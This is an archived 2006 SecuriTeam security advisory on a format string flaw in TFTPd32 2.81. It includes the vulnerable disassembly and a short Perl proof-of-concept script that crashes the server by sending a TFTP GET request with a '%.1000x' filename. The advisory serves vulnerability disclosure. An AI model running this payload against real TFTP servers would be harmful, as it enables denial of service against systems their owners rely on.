The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NT] TFTPd Filename Format String


<< Previous INDEX Search src / Print Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 25 Jan 2006 09:37:00 +0200
Subject: [NT] TFTPd Filename Format String
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060125112526.77B8C588A@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  TFTPd Filename Format String
------------------------------------------------------------------------


SUMMARY

" <http://tftpd32.jounin.net/>; TFTPd32 includes DHCP, TFTP, SNTP and 
Syslog servers as well as a TFTP client."

A format string vulnerability in TFTPd32 allows remote attackers to cause 
a DoS against the product.

DETAILS

Vulnerable Systems:
 * TFTPd32 version 2.81

Due to incorrect use of format strings there is a possibility of remote 
code execution. You can trigger this vulnerability by sending SEND or GET 
request with a specially formated string.

Vulnerable code:
LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX                                 ; /Arglist
PUSH EDX                                 ; |Format
PUSH EAX                                 ; |s = 00E6F4E8
CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA

Exploit:
#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research 
http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => 
$host,Proto=> 'udp');
$bzz = "\x00\x01" ;   #GET
$bzz .= "%.1000x\x00";
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet
$tftpudp->send($bzz);


ADDITIONAL INFORMATION

The original article can be found at:
 <http://www.critical.lt/?vulnerabilities/200>; 
http://www.critical.lt/?vulnerabilities/200

Related articles:
 *  <http://www.securiteam.com/windowsntfocus/6D00D2061G.html>; TFTPD32 
Directory Traversal Vulnerability
 *  <http://www.securiteam.com/windowsntfocus/6C00C2061A.html>; TFTPD32 
Buffer Overflow Vulnerability (Long filename)




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру